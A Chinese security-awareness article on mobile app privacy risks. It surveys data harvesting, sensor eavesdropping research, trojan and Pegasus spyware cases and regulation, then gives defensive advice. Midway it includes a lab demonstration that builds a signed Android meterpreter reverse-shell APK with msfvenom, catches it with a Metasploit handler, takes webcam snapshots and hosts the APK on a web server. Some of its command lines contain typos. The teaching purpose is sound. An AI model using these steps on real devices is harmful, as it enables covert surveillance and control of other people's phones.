安全意识培训-移动终端应用安全 - FreeBuf网络安全行业门户 限时体验

编组备份 4

网页灯泡

在现实生活中，你是不是也遇到过这种情况：

当你和同事聊新房装修，购买家具的时候，各种购物APP就给你推送装修和家具广告；

当你在和朋友聊天，随口说了句“种草什么”“想要什么”，第二天手机APP就有各种花式精准推送。

原来，最了解你的不是你的父母，而是潜藏在你手机里的各大APP，购物APP知道你想买什么，新闻资讯类APP知道你爱看什么，团购类APP知道你想吃什么……只有你想不到的，没有它不知道的。

聪明的APP

我们身处数据包围的时代，享受信息和科技带给我们的便利，有时这种便利细思极恐，

谈点和我们大众相关，比如购物或视频推荐，能从海量数据中快速人性化替你找到你想要的，极大提高了我们效率和使用体验。再比如很多手机或相册类APP会按相片上的 时间 地点 场景 人物 甚至证件类型整理好分类，惊艳的同时，你有没有好奇它是怎么做到的呢。下面我们以这个为切入点，一张照片拍摄的时候 除了相片还会携带 拍摄时间，GPS(位置) 拍摄设备等信息。AI算法对图片自动识别分类，脑补下小学老师讲的一个故事包含三要素，时间地点人物，这里一张照片就齐了，你自己就是故事的记录者。从商业角度，有价值的不是这些信息更多是对信息提炼后的标签及用户画像，通过定位信息知道日常去哪些地点门店，打上消费习惯和档次的标签，拍摄的对象是科技控，宠物控，从背景环境着装等标签什么职业 家庭有几口人性格偏向等  日常吃什么药标签患什么病等，部分照片包含身*证，帐号密码，资产等信息。这些可能影响更直接些。这仅为一些照片，还有很多收集的方式，比如浏览器搜过某个产品，你会惊奇发现在购物APP里会贴心的推荐在显眼的位置，这个很有可能是这个APP有权限读取你的浏览记录或存储与剪贴板中的内容。

展开想像下用户基数够大是不是可以人和人之间做关联，6个电话就能见到奥巴马不是停留在理论了。

再讲些和普通大众可能接触比较少的APP的窃听。电影窃听风云大家可能都看过，

在国际信息安全界顶级会议 “网络与分布式系统安全会议（NDSS 2020）”上，发表了一篇来自浙江大学网络空间安全学院任奎教授团队、加拿大麦吉尔大学、多伦多大学学者团队的最新研究成果，该成果显示：

当前智能手机App可在用户不知情、无需系统授权的情况下，利用手机内置加速度传感器采集手机扬声器所发出声音的震动信号，实现对用户语音的窃听。

加速度传感器之所以能被用来监听电话，主要是由于智能手机本身的物理结构。由于声音信号是一种由震动产生的可以通过气态，液态，固态的各类介质进行传播的声波，因此手机扬声器发出的声音会引起手机本身的震动。而加速度传感器可以准确的感知到手机本身的震动，因此攻击者可以通过加速传感器来捕捉声音信号引起的手机震动进而推断出其中所包含的敏感信息。浙江大学网络安全团队的验结果显示，在关键字检测任务中，这种窃听攻击可以以平均90%的准确率识别并定位用户语音中所携带的关键字。这个加速传感器就是手机的“窃听器”。在日常手机应用中，加速度传感器通常被用户测速、记录步数等，因此在普遍认知中似乎与通话、短信、通信录等敏感信息产生关联，因此 App 也无需获得用户授权就可以获得智能手机的加速度信息。这也就是为什么我们对这些“窃听”防不胜防了。有哪些APP在窃取我们的隐私？

就比如 这个也圈类确有的事件。在有专业电子型号屏蔽的的隔音房里，攻击者通过安装了特制带窃听的灯泡，通过肉眼不可见的光波变化绕过屏蔽机制，传输给远处解码设备还原隔音房里的对话。

当然这些黑科技对于普通周民众可能没有这种“待遇"享受，对安全个人理解，没有绝对的，更多的是取舍，收益和风险的平衡，

安全的面太广，我们把焦点聚焦更木马攻击和窃听这块。

2020年12月5日，新京报网一则“金立暗中给手机植入木马”的消息将昔日流行的手机品牌金立再次拉入公众视线。根据11月30日公开的一份刑事判决书，金立旗下子公司通过将“拉活木马”植入到金立手机内置APP中，达到在用户不知情的情况下拉活指定APP广告的效果，赚取拉活费用。这件事还牵扯进了魅族。针对相关报道，魅族官方微博发文回应称，“魅族坚持合法经营，未参与相关非法事件。未来我们将继续深耕手机安全业务，保障手机信息安全”。

参考连接 https://www.bjnews.com.cn/detail/160734542315738.html

2021年央视3.15晚会对手机清理软件入侵老年入手机，读取老年人隐私信息的问题进行了曝光并其深入调查

手机被植入植软件收集数据，被遥控用于诈骗，有人利用外部服务器控制手机向外发送诈骗短信

参考连接 https://www.thepaper.cn/newsDetail_forward_11729822

以上事件均为安卓系统，iOS系统向来以安全性著称 , 不过在信息安全领域严格来说没有绝对的安全 , 即便是iOS也会存在漏洞。其中比较热的事件为美国国务院员工 纽约*报记者 部分政要人员 都被报被报其iphone手机被植入间谍软件。

苹果称美国国务院员工的手机已被未知攻击者入侵，他们使用名为 ForcedEntry 的 iOS 漏洞部署以色列监控公司 NSO Group 开发的 Pegasus 间谍软件。（据《华盛顿*报》报道，至少有 11 人）该消息是在美国上个月制裁 NSO 集团和来自以色列、俄罗斯和新加坡的其他三家公司开发间谍软件和销售国家资助的黑客工具之后发布的

NSO是已被添加到商务部工业安全局 (BIS) 实体名单中的公司，以提供国家黑客用来监视政府官员、记者和活动家的软件

参考连接 https://www.bleepingcomputer.com/news/security/us-state-dept-employees-phones-hacked-using-nso-spyware/国内资讯|Apple起诉以色列间谍软件 Pegasus 非法入侵监听iphone用户

https://www.163.com/dy/article/GQ3FVQ4E0552KI0B.html

近期iOS系统爆重大漏洞，劫持关机操作伪造关机效果实现秘密监视

https://www.163.com/dy/article/GT9RJN3E0552KI0B.html

国家计算机病毒应急处理中心监测发现十七款违法移动应用

2021年12月20日 国家计算机病毒应急处理中心近期通过互联网监测发现17款移动应用存在隐私不合规行为，违反网络安全法、个人信息保护法相关规定，涉嫌超范围采集个人隐私信息。其中包括《哈啰出行》《58同城》等应用

https://www.cnaac.org.cn/newShowData.html?id=243

早期手机应用商店里也存在木马，经过近几年的国家及行业的推动，目前应用商店里木马以绝迹，木马的植入方式更多，通过图片、链接、不安全的无线网络、点击红包等完成。

木马植入手机后基本上控制端就成了透明的，你的电话，微信，在手机上的任何操作只要对方想看没有看不到听不到的

是不是真的如说的这么玄乎。

这里我们准备了 简易版的APP

一台安卓终端设备(模拟被攻击设备）

一台PC机(模拟攻击设备）

#msfvenom -p android/meterpreter/reverse_tcp lhost=本机的IP lport=设置端口 R> 生成木马文件的路径
msfvenom -p android/meterpreter/reverse_tcp lhost=xxx.xxx.xxx.xxx lport=4444 R > t.apk
#zipalign 安装
apt-get install zipalign
#使用zipalign对apk进行对齐
zipalign -v 4 t.apk tz.apk
#生成密钥对 keytool -genkey -v -keystore cg.keystore -alias cg -keyalg RSA -keysize 2048 -validity 10000
# 解释：keytool -genkeypair -keystore 密钥库名 -alias 密钥别名 -validity 天数 -keyalg RSA
#对apk签名
apksigner sign --ks cg.keystore --ks-key-alias cg tz.apk
#解释： apksigner sign --ks 密钥库名 --ks-key-alias 密钥别名 tz.apk
#对apk进行签名验证
apksigner verify -v --print-certs tz.apk msfconsole 
#打开控制台
use exploit/multi/handler
//加载模块 set playload android/meterpreter/reverse_tcp
//设置攻击载荷 set lhost 本机IP set lport 生成木马时设置的端口
exploit 
//开始侦听
# 这里出了点小插曲，shell 一直连过来自己就断了，重启了下android后OK
#运行此后门，在kali端有响应 ，说明android中马，
在kali中使用mfs中的webcam_snmp通过后门程序拍一张图片
meterpreter> webcam_snap ecord_mic -d 10
#apt-get install apache2 -y
#cp /root/tz.apk /var/www/html/
#curl http://xxx.xxx.xxx.xxx/tz.apk

APP能做什么，安装个app的时候手机提示要一堆的权限，通讯录，位置，存储，短信，电话， 摄像头 麦克风甚至是软件安装或系统权限，当你点击确认的时候可能打开的是潘多拉的盒子

当这个特殊的APP安装运行后， 就可以通过攻击设备上控制获取 其录音 摄像头等

防范建议

既然风险这么高，在平时生活中我们该如何去预防一些手机APP窃取隐私呢？

对于普通消费者来说，从下面三个方向给出些建议供大家参考

一. 手机的系统

1 不要开启 “允许未知来源的APK安装”

最好只使用从官方应用商店下载的APK。当然但是这并不意味着从官方应用商店下载的应用就可以完全相信，例如同样是间谍软件的Lizpizzan家族，其攻击链一开始就是是从一个完全正常的，在应用商店上架的APP开始，再由它下载安装恶意程序。

不过作为用户而言，不开启“允许未知来源的APK安全”这一选项仍然可以保证安全。

2 升级到新版本系统

虽说防范 0day 攻击基本不现实，但是就这个案例来说，Framaroot所利用漏洞仅能在Android 8.0及更低使用，若设备内核版本号高于 Android 8.0则可以不用担心被现有捕获的Chrysaor攻击。

但是这并不意味着绝对安全，无论内核版本多少，都建议当即时跟着厂商发布的更新版本更新，确保不会被 1day 或是曾经还未修复的漏洞攻击。

3 避免刷机或root 

无论你有多大的冲动，都不要 root自己的智能手机。尽管root手机会有一些好处，但要知道，这也会让自己的智能手机更容易被恶意软件攻击。先不说是否可以安全地拿到 root 权限，即使 root 工具是安全的，也让恶意软件有了更多可趁之机。

而若您已经开启了该选项并手动获取了 root 权限，请仔细检查应用清单，看是否有陌生的应用程序，虽然目前主流的已经被披露出的Android端间谍软件都是以独立app存在的，但是都已经放入了/system分区，而我们刷机或是恢复出厂设置都是擦除/cache与/data分区，所以双清也不会解决问题。只有准确找出间谍软件，然后利用root权限将其删除，才能保证不被影响。

二. app的下载

从正规的应用商店下载。很大程度避免下到些恶意木马软件。

APP安全合规的监管机构：APP违法违规收集使用个人信息治理工作组(APP治理小组)、工业和信息化部信息通讯管理局(工信部)、国家移动互联网应用安全管理中心(病毒中心)、地方通信局、地方网安。I具体执行APP合规检测和产出报告的是和网安合作的公安部三所下面的一个实验室，简称叫公计检，全称是：公安部计算机信息系统安全产品质量监督检验中心

对APP的安全合规检测主要还是通过采购第三方的APP漏洞扫描工具（目前第三方漏洞扫描产品有：爱加密、梆梆、网易、几维、360等）APP扫描，然后出详细报告，在通过扫描得出的报告进行做对应的应对方案。。

安卓安全合规的违规处理方式：通告--->罚款--->应用下架--->停业整顿。

苹果的应用商店这块应用质量和安全性上控制的可能更好些。

三. app权限控制

1 手机自带的应用行为记录或控制 

空白通行证授予应用权限，但向应用返回空信息防止个人真实数据泄漏。

照片拍摄或分享时抹去位置拍摄等信息。

虚拟身份”功能。开启这个功能后，对于不给权限不让用或者空白信息不让用的软件，能够生成一个随时能重置的ID，扔给它们，然后定期更换。这样可以做到一定的隐私保护。

针对定位 模糊定位 通过差分隐私技术对位置信息模糊处理，应用只能知道大致位置

重要资料文件 放私密文件夹加密保存

2 手机分身或应用分身

配备两台以上手机物理隔离开当然是最好的，像电影里一台老式诺基亚只用于通话对我们可能不现实，但把区分，日常机器权限安全做严格些，不常用的app或有可能会有风险的应用安装到另一台备用的上，现在很多手机厂商也意识到用户对安全及隐私的诉求，安全也逐渐成为除功能和配置外的买点。

2 识别码与应用权限关闭

我们都知道，手机都有固定的识别码，重置广告标识符相当于将真正的标识码隐藏起来，以随机号码应对广告追踪，可以在一定程度上避免隐私泄露。

除了手机识别码隐藏，安卓系统还能突破应用权限限制。安卓原生是有应用程序权限管理的，即是AppOps，只是谷歌把它默认隐藏了。AppOps全称是Application Operations，中文含义即应用操作启动。第三方应用商店中，可以下载AppOps软件，用于突破APP限制。

4 轻应用替代

最好的隐私保护办法就是从源头上杜绝。首先下载APP是认证官方应用商店，不要下载来路不明的APP。其次，尽量减少手机中APP数量，以轻应用替代。什么是轻应用呢？轻应用是一种无需下载、即搜即用的全功能的快捷APP。微信小程序、支付宝小程序、华为快应用、谷歌Chrome轻应用，都是轻应用的一种。

手机下载的APP需要各种应用与权限，部分APP还会在用户不知道的情况下搜集用户隐私。轻应用则不同，本质上它更像一个个网页综合在一起，不会去搜集用户设备上的信息。虽然在实际使用轻应用并没有APP方便，但是为了隐私保护这些都是值得的。

我们作为普通消费者，不能因为很难预防而放弃抵抗，应该主动学习网络安全基本知识，提高隐私泄露防范意识，改变不良的上网习惯，这才是保护个人隐私的切实之策。